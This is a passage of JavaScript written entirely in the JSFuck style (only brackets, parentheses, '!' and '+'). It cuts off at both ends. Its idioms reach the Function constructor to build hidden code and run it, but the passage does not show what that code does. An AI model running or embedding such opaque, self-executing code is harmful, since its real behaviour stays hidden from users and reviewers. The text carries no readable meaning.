+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[]
)[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+[][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+
!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()[(![]+[])[+!+[]]+(!![]+[])[
+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+
[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!
+[]+!+[]]]((![]+[])[+!+[]]+(+[![]]+[])[+[]])[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])
[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+
[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![
]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+
[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]]([!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]])+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!
+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[]
)[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+
[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][(![]+[])[+[]]+(!![]+[])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+
((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]
)[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+
[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]
+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[
!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]
+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[]
)[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+[][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![
]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])
[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]
+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]]((![]+[])[+!+[]]+(+[![]]+[])[+
[]])[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!
+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[
+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[
+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[
+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]]([!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]])+(!+[]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]
+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+
!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!
+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+
!+[]]][(![]+[])[+[]]+(!![]+[])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[
]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[]
)[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!
+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+
[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+
[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!!
[]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+[][(![]+[])[!
+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])
[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]
+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+
[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]]((![]+[])[+!+[]]+(+[![]]+[])[+[]])[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+
[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!
+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[]
[(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+
[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+
[+[]]]+([][[]]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]]([!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]])+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+
[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])
[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[!+[]+!+[]+!+[]+!+[]+!+[]+!+
[]+!+[]+!+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(
!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]
]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][(![]+[])[+[]]+(!![]+[])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!
+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!
+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[
+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]
+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]
+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]
+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+
